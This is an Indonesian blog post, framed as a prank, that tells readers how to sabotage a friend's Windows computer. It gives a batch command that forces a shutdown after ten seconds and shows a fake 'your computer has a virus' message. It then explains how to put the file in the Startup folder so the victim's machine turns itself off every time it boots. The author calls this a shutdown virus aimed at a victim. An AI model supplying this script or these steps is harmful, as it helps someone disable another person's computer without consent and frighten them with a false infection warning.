Widget edited by super-bee
Home » » ngejahilin temen pake notepad…!! (dijamin stress…:D )

ngejahilin temen pake notepad…!! (dijamin stress…:D )

Written By Unknown on Sabtu, 10 Agustus 2013 | 21.58


apa yang ada dibenak anda begitu mendengar kata notepad…?? sebuah program MUBAZIR bawaan microsoft….?? program remeh temeh yang nangkring di kumpulan folder accessories , sebuah program untuk ngetik-ngetik gak jelas…?? hah….notepad..?? apaan tuh…??
apapun yang ada dibenak anda, saya yakin sebagian besar dari anda mungkin mengaggap remeh dan sepele program mungil yang satu ini, tapi tahukah anda bahwa program yang anda anggap sepele ini sebenernya bisa menghasilkan mimpi buruk bagi kehidupan berkomputer anda….?? gak percaya…?? cek dis out….
panggil program notepad, biasanya sih doi mendekam di menu start > all programs > accessories > notepad , kalo anda make mikocok windows tujuh ato vista, anda tinggal mengetikan notepad pada start menu , tekan enter, dah nongol deh ntar tuh notepad…
kalo udah nongol ketikan script berikut ini:
shutdown -s -t 10 -c "KOMPUTER ANDA KENA PIRUS,GANTI YANG BARU YA" –f
tentu saja untuk text KOMPUTER ANDA KENA PIRUS, GANTI YANG BARU YA bisa anda ganti dengan text anda sendiri, kreatif-kreatif anda lah…
udah..?? simpan file dengan menekan tombol CTRL + S, lalu beri nama ericakep.bat , kalo anda gak ikhlas boleh diganti namanya terserah anda deh, mau diganti eriganteng.bat atau eritampan.bat atau ericute.bat juga boleh….sama saja, asal ekstensinya harus .bat
lalu perhatikan pada kolom file type, pilih all files lalu klik tombol save , untuk lokasi penyimpanan bisa anda sesuaikan sendiri deh…bisa disimpan di C:/ , D:/ atau di desktop juga boleh.
jika sudah, klik tombol start windows anda > all programs > startup , lalu klik kanan folder startup yang ada disana kemudian pilih explore  , maka akan muncul jendela eksplorer baru
nah copy file ericakep.bat tadi kedalam jendela eksplorer ini, jika sudah restart komputer anda……:), dan selamat menikmati….:)
jika sudah simpan file virus shutdown anda kedalam folder startup dengan cara seperti yang telah kita pelajari diatas, maka selanjutnya ketika korban menghidupkan komputernya , maka komputernya akan di matikan secara paksa, dan begitu korban mencoba menghidupkan komputer lagi, maka komputernya akan mati lagi secara otomatis, begitu seterusnya, dijamin ngeselin…..
———————————————————-
temukan segudang trik-trik gokiel dan aneh lainnya dalam buku the deathly tricks di toko buku terdekat di kota anda (ujung2nya promosi nih…pait..pait…pait..)

Share this article :
Comments
0 Comments

0 komentar:

Posting Komentar

TOLONG KOMENTARNYA SEHUBUNGAN DENGAN ARTIKEL YANG ADA .

Product :
 
Support : Hacker Siantar
Copyright © 2013. Hacker Siantar - All Rights Reserved
Template Created by Creating Website Published by Hacker Siantar
Penulis ArtikelRidwan Situmorang